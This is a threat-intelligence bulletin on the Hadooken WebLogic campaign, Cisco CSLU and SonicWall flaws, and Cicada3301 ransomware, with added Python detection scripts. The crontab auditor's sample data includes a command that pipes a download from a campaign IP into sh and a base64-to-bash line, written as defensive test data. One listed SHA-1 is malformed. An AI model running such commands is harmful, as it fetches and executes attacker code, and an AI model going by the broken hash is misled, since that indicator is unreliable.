Hadooken Malware Targeting Oracle WebLogic

SUMMARY

A new malware campaign was recently identified that targets Linux environments, focusing on crypto-mining and botnet malware deployment. This operation specifically targets Oracle WebLogic servers to deliver a malware strain called “Hadooken,” as reported by cloud security firm Aqua. “When Hadooken is executed, it installs Tsunami malware and deploys a crypto miner.”

 

TECHNICAL DETAILS

Oracle WebLogic Server is an enterprise-level Java EE application server, widely used for building, deploying, and managing large-scale distributed applications. It is popular in banking, e-commerce, and critical business systems due to its support for Java, transaction management, and scalability. WebLogic is often targeted in cyberattacks, primarily due to vulnerabilities such as deserialization flaws, improper access controls, and common misconfigurations – examples include weak credentials or exposed admin consoles.  These weaknesses can lead to severe risks, including remote code execution (RCE), privilege escalation, and data breaches, especially if systems are not properly patched or secured.

The recent attack campaign leverages these vulnerabilities and configuration weaknesses to gain an initial foothold and execute arbitrary code on vulnerable WebLogic instances. The attack begins by deploying two nearly identical payloads: one written in Python and the other as a shell script. These payloads retrieve the “Hadooken” malware from a remote server, with IP addresses “89.185.85[.]102” or “185.174.136[.]204.”

The shell script version is designed to search directories containing SSH data, including user credentials and host information, and to use this data to launch attacks on other known servers. This enables lateral movement within the compromised environment, spreading Hadooken malware across the network or connected systems.

Hadooken itself consists of two primary components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet named “Tsunami” (also known as Kaiten). Tsunami has previously targeted Jenkins and WebLogic services, especially in Kubernetes environments. Once deployed, Hadooken ensures persistence by creating cron jobs that run the crypto miner at regular intervals.

To evade detection, Hadooken employs various defense evasion techniques. It uses Base64-encoded payloads and disguises malicious processes by naming them innocuously as “bash” or “java” to blend with legitimate system activity. Additionally, it deletes artifacts and traces of its execution to avoid detection. The IP address 89.185.85[.]102 is associated with a hosting provider in Germany, Aeza International LTD (AS210644). A report from Uptycs in February 2024 linked this IP to the “8220 Gang”, which exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center for cryptocurrency mining. The same infrastructure is now implicated in the Hadooken campaign, reflecting a consistent trend in abusing known enterprise vulnerabilities.
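The process-name disguise described above can be hunted by comparing each process's reported name with the binary that actually backs it. The following is an added example, not code from the advisory or from Aqua's report; the staging-directory list, the function names and the sample records are assumptions made for illustration.

```python
import os

# Process names the advisory says Hadooken hides behind.
DISGUISE_NAMES = {"bash", "java"}
# Assumption: world-writable staging directories a real bash or java never runs from.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DELETED = " (deleted)"  # suffix the kernel appends when the binary was unlinked

def collect_procs(proc_root="/proc"):
    """Return (pid, comm, exe) for each readable process on a live Linux host."""
    procs = []
    if not os.path.isdir(proc_root):
        return procs
    for entry in filter(str.isdigit, os.listdir(proc_root)):
        try:
            with open(os.path.join(proc_root, entry, "comm")) as fh:
                comm = fh.read().strip()
            exe = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:  # kernel thread, exited process, or no permission
            continue
        procs.append((int(entry), comm, exe))
    return procs

def find_masquerades(procs):
    """Flag processes named bash/java whose backing binary does not fit the name."""
    findings = []
    for pid, comm, exe in procs:
        if comm not in DISGUISE_NAMES:
            continue
        deleted = exe.endswith(DELETED)
        path = exe[: -len(DELETED)] if deleted else exe
        reasons = []
        if deleted:
            reasons.append("binary deleted from disk")
        if os.path.basename(path) != comm:
            reasons.append("name does not match binary")
        if path.startswith(STAGING_DIRS):
            reasons.append("runs from staging directory")
        if reasons:
            findings.append((pid, exe, reasons))
    return findings

# Constructed sample records (pid, comm, exe); not taken from a real host.
SAMPLE = [(812, "bash", "/usr/bin/bash"), (4410, "java", "/u01/oracle/jdk/bin/java"),
          (5120, "bash", "/tmp/.x/kworker (deleted)"), (5133, "java", "/dev/shm/java")]

if __name__ == "__main__":
    for pid, exe, reasons in find_masquerades(collect_procs() or SAMPLE):
        print(pid, exe, "; ".join(reasons))
```

A deleted binary on its own also appears after a routine package upgrade, so that reason is most useful in combination with the other two.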

 

INDICATORS OF COMPROMISE (IOCs)

Attacker IPs:

  • 185.174.136[.]204
  • 89.185.85[.]102

 

RECOMMENDATIONS

  • Ensure that Oracle WebLogic servers are consistently updated with the latest security patches to close known vulnerabilities like deserialization flaws.
  • Use strong, unique credentials for all admin and user accounts, and disable unnecessary admin interfaces. Implement multi-factor authentication (MFA) where possible.
  • Regularly audit server configurations to identify misconfigurations such as exposed admin consoles and weak credentials. Limit access to sensitive areas like SSH directories.
  • Set up intrusion detection systems (IDS) to monitor unusual traffic, especially from known malicious IP addresses, such as those linked to the Hadooken campaign.
  • Restrict the privileges of user accounts and processes to minimize the impact of potential malware execution.
  • Install and maintain anti-malware tools on all systems to detect and block malicious activities, including crypto miners and botnets like Tsunami.
  • Automate the process of identifying and mitigating vulnerabilities using tools such as vulnerability scanners and patch management solutions.
  • Segment the network to prevent malware from easily moving laterally between systems. Use firewalls and access control lists (ACLs) to enforce boundaries.
  • Maintain comprehensive logging of all system and network activities to detect unusual behaviors, such as unauthorized SSH access or cron job creations.
  • Ensure regular backups of critical systems and test recovery plans to minimize data loss in the event of a malware attack or breach.
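The cron persistence and Base64 staging described in the technical details, together with the recommendation to watch for cron job creation, can be turned into a periodic crontab audit. The following is an added example, not code from the advisory or from Aqua's report; the rule set, function names and sample crontab are assumptions, and only the two IP addresses come from this page.

```python
import re

# Download hosts named in this advisory.
CAMPAIGN_IPS = ("89.185.85.102", "185.174.136.204")
# Assumption: illustrative heuristics written for this example, not vendor signatures.
RULES = [
    ("campaign-ip", re.compile("|".join(map(re.escape, CAMPAIGN_IPS)))),
    ("base64-to-shell", re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b")),
    ("fetch-to-interpreter",
     re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:(?:ba)?sh|python[0-9.]*)\b")),
    ("staging-dir-exec",
     re.compile(r"(?:^|[;&|]\s*|\b(?:ba)?sh\s+)/(?:tmp|var/tmp|dev/shm)/\S+")),
]

def command_of(line, has_user_field=False):
    """Drop the schedule (and the user column of /etc/crontab-style files)."""
    skip = (1 if line.startswith("@") else 5) + (1 if has_user_field else 0)
    fields = line.split(None, skip)
    return fields[skip] if len(fields) > skip else ""

def audit_crontab(text, has_user_field=False):
    """Return (line number, matched rule names, command) for suspicious entries."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        cmd = command_of(line, has_user_field)
        hits = [name for name, rx in RULES if rx.search(cmd)]
        if hits:
            findings.append((lineno, hits, cmd))
    return findings

# Constructed crontab for illustration; the URL path and Base64 string are placeholders.
SAMPLE = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/5 * * * * echo Y29uc3RydWN0ZWQ= | base64 -d | bash
@reboot /tmp/.cache/java -c /tmp/.cache/cfg
17 * * * * curl -s http://89.185.85.102/PLACEHOLDER | sh
30 2 * * 0 tar czf /var/backups/etc.tgz /etc
"""

if __name__ == "__main__":
    for lineno, hits, cmd in audit_crontab(SAMPLE):
        print(f"line {lineno}: {', '.join(hits)}: {cmd}")
```

Pass `has_user_field=True` for `/etc/crontab` and `/etc/cron.d` files, which carry a user column before the command.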

 


Cisco Smart Licensing Utility Vulnerability

SUMMARY

Cisco recently addressed two critical vulnerabilities (CVE-2024-20439 and CVE-2024-20440) in the Cisco Smart Licensing Utility (CSLU), removing a backdoor administrative account and fixing an information disclosure flaw. These vulnerabilities could allow remote attackers to gain unauthorized administrative access or retrieve sensitive data. Users are advised to update to the latest version to prevent exploitation.

 

RISK SCORE

CVE-ID            CVSSv3 Score
CVE-2024-20439    9.8
CVE-2024-20440    9.8

 

VULNERABILITY DETAILS

CSLU is a Windows-based tool designed to manage licenses and associated products locally, without the need to connect to Cisco’s cloud-based Smart Software Manager.

The first flaw, CVE-2024-20439, involved a backdoor account that allowed unauthorized attackers to log in with administrative privileges using static, hardcoded credentials, through the API of the Cisco Smart Licensing Utility application. This vulnerability was particularly dangerous and allowed attackers to gain full access to systems remotely without authentication.

The second flaw, CVE-2024-20440, involved the exposure of sensitive log files containing API credentials, accessible through crafted HTTP requests. This vulnerability impacted only certain versions of the CSLU and posed a significant risk by leaking sensitive data that could be used in further attacks.

 

AFFECTED PRODUCTS

  • Cisco Smart License Utility 2.0.0, 2.1.0, and 2.2.0

 

REMEDIATION

  • Update to Cisco Smart License Utility 2.3.0 or later.

 


SonicWall Firewall Vulnerability

SUMMARY

SonicWall’s self-disclosed critical security vulnerability in SonicOS is now under active exploitation.  Available updates should be applied as soon as possible. The vulnerability (CVE-2024-40766) has a CVSS score of 9.3 out of 10 and stems from improper access control in the SonicOS management interface and SSLVPN, which could allow unauthorized access to resources and, under certain conditions, trigger a firewall crash.

 

TECHNICAL DETAILS

CVE-2024-40766 is a critical access control vulnerability with a CVSS v3 score of 9.3, affecting multiple generations of SonicWall Firewall devices, including Gen 5, Gen 6, and Gen 7 models. The flaw, initially disclosed on August 22, 2024, affects the management interface of SonicOS, but recent updates indicate it also impacts the SSLVPN feature. The vulnerability could allow unauthorized resource access and may also lead to firewall crashes.

 

AFFECTED DEVICES AND VERSIONS

  • SonicWall Gen 5 running SonicOS version 5.9.2.14-12o and older: Fixed in SonicOS version 5.9.2.14-13o.
  • SonicWall Gen 6 running SonicOS version 6.5.4.14-109n and older: Fixed in 6.5.2.8-2n (for SM9800, NSsp 12400, NSsp 12800) and 6.5.4.15-116n (for other Gen 6 firewalls).
  • SonicWall Gen 7 running SonicOS version 7.0.1-5035 and older: The issue is not reproducible in version 7.0.1-5035 and later.

 

SonicWall has not provided detailed technical information on how the vulnerability is exploited but highlights its potential to allow unauthorized access and cause firewall failures, which could leave corporate networks exposed. Given that SonicWall firewalls are often accessible via the internet for VPN services, they are prime targets for exploitation.

 

RECOMMENDATIONS

SonicWall recommends the following critical steps for securing devices against CVE-2024-40766:

  • Restrict SonicOS management portal access to trusted sources only. Disabling internet access to the WAN management portal entirely can significantly reduce exposure.
  • Only allow SSLVPN access from trusted sources. If SSLVPN functionality is not required, disable it to further reduce attack surface.
  • For Gen 5 and Gen 6 devices, administrators should enforce immediate password changes for SSLVPN users with local accounts. The “User must change password” option should also be enabled for all local users.
  • Activate MFA for all SSLVPN users to add an additional layer of security. SonicWall supports MFA using Time-based One-Time Passwords (TOTP) or email-based OTPs, providing stronger protection against unauthorized access. Detailed configuration instructions for MFA are available on SonicWall’s support portal.
  • Ensure that all affected devices are running the latest patched firmware versions as outlined above. Regularly check for firmware updates and apply them promptly to mitigate known vulnerabilities.

 


Cicada3301 Ransomware Targeting Linux-Based ESXi Servers

SUMMARY

A ransomware-as-a-service (RaaS) operation is posing as the legitimate Cicada 3301 organization and has already listed 19 victims on its extortion site. The new ransomware employs techniques similar to those of BlackCat ransomware. It uses robust encryption methods and exploits system utilities to disable security measures. The ransomware is distributed via a RaaS platform and targets a wide range of file extensions.

 

TECHNICAL DETAILS

Cicada3301 is a new ransomware variant that was first seen in June 2024 and has been active in exploiting vulnerabilities in small to medium-sized businesses (SMBs). This ransomware is written in Rust, allowing it to operate on both Windows and Linux/ESXi platforms, showcasing its versatility and broader attack surface. Cicada3301 operates under a ransomware-as-a-service (RaaS) model, with its developers actively recruiting affiliates on underground forums.

Cicada3301 incorporates several advanced features from BlackCat, such as using ChaCha20 for encryption and manipulating system utilities like fsutil, IISReset.exe, and wevtutil to disrupt system recovery and erase traces of its activity.  Additionally, it can execute remote commands using embedded credentials via PsExec, enhance network traffic capacity for malicious operations, and terminate processes related to backup and recovery to prevent data restoration.

The ransomware specifically targets a range of 35 file extensions important to enterprise operations, ensuring the encryption of valuable data, including: sql, doc, rtf, xls, jpg, jpeg, psd, docm, xlsm, ods, ppsx, png, raw, dotx, xltx, pptx, ppsm, gif, bmp, dotm, xltm, pptm, odp, webp, pdf, odt, xlsb, ptox, mdf, tiff, docx, xlsx, xlam, potm, and txt.

Cicada3301 also used the EDRSandBlast tool to exploit vulnerabilities in signed drivers, a technique previously used by the BlackByte group, to evade endpoint detection and response (EDR) systems.

 

INDICATORS OF COMPROMISE (IOCs)

SHA-1:

  • c08a863c2e5288d4ce2a9d46a725518f12711a7
  • 54a8fe5c70ed0007fdd346a9a75977fd9f8ad24a

 

RECOMMENDATIONS

  • Utilize advanced endpoint protection solutions to detect and block ransomware behaviors, including the misuse of legitimate tools for malicious activities.
  • Ensure all systems and software are regularly updated to patch vulnerabilities that could serve as entry points for ransomware.
  • Maintain frequent backups of critical data, and regularly test recovery processes to confirm they are effective in ransomware scenarios.
  • Implement network segmentation to contain the spread of ransomware within isolated network segments.
  • Enforce policies that restrict the execution of scripts, such as PowerShell, that attackers commonly exploit.
  • Conduct user training to raise awareness of phishing risks and strengthen defenses against social engineering attacks.
  • Deploy continuous monitoring tools to identify early indicators of compromise and enable rapid response to mitigate threats.
  • Secure and monitor the use of administrative tools like PsExec, ensuring that management interfaces are not publicly accessible.
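Each of the utilities named in the technical details (fsutil, IISReset.exe, wevtutil, PsExec) is routine on its own, so monitoring works better when it looks for several of them on one host in a short span. The following is an added example, not code from the advisory; the ten-minute window, the three-tool threshold, the function name and the sample events are assumptions, and the input is assumed to be Windows process-creation telemetry reduced to timestamp, host and image path.

```python
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

# Utilities the advisory names, keyed by lower-cased image file name.
WATCHED = {"fsutil.exe": "fsutil", "iisreset.exe": "iisreset",
           "wevtutil.exe": "wevtutil", "psexec.exe": "psexec", "psexec64.exe": "psexec"}
WINDOW = timedelta(minutes=10)  # assumption: correlation window
MIN_DISTINCT = 3                # assumption: distinct tools needed to alert

def find_bursts(events):
    """events: (ISO timestamp, host, image path). Return at most one alert per host."""
    by_host = defaultdict(list)
    for ts, host, image in events:
        tool = WATCHED.get(ntpath.basename(image).lower())
        if tool:
            by_host[host].append((datetime.fromisoformat(ts), tool))
    alerts = []
    for host, hits in sorted(by_host.items()):
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > WINDOW:
                start += 1  # slide the window forward
            tools = sorted({name for _, name in hits[start:end + 1]})
            if len(tools) >= MIN_DISTINCT:
                alerts.append((host, hits[start][0].isoformat(), tools))
                break
    return alerts

# Constructed process-creation events for illustration (timestamp, host, image).
SAMPLE = [
    ("2024-09-01T02:14:05", "FS01", r"C:\Windows\System32\wevtutil.exe"),
    ("2024-09-01T02:14:40", "FS01", r"C:\Windows\System32\fsutil.exe"),
    ("2024-09-01T02:15:10", "FS01", r"C:\Windows\System32\iisreset.exe"),
    ("2024-09-01T09:00:00", "WEB02", r"C:\Windows\System32\iisreset.exe"),
    ("2024-09-01T15:30:00", "WEB02", r"C:\Windows\System32\wevtutil.exe"),
    ("2024-09-01T11:02:00", "ADM03", r"C:\Tools\PsExec64.exe"),
    ("2024-09-01T11:03:00", "ADM03", r"C:\Tools\PsExec.exe"),
]

if __name__ == "__main__":
    for host, since, tools in find_bursts(SAMPLE):
        print(host, since, ", ".join(tools))
```

Matching on the image file name misses renamed copies; where the telemetry records the binary's original file name, match on that field instead.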

 
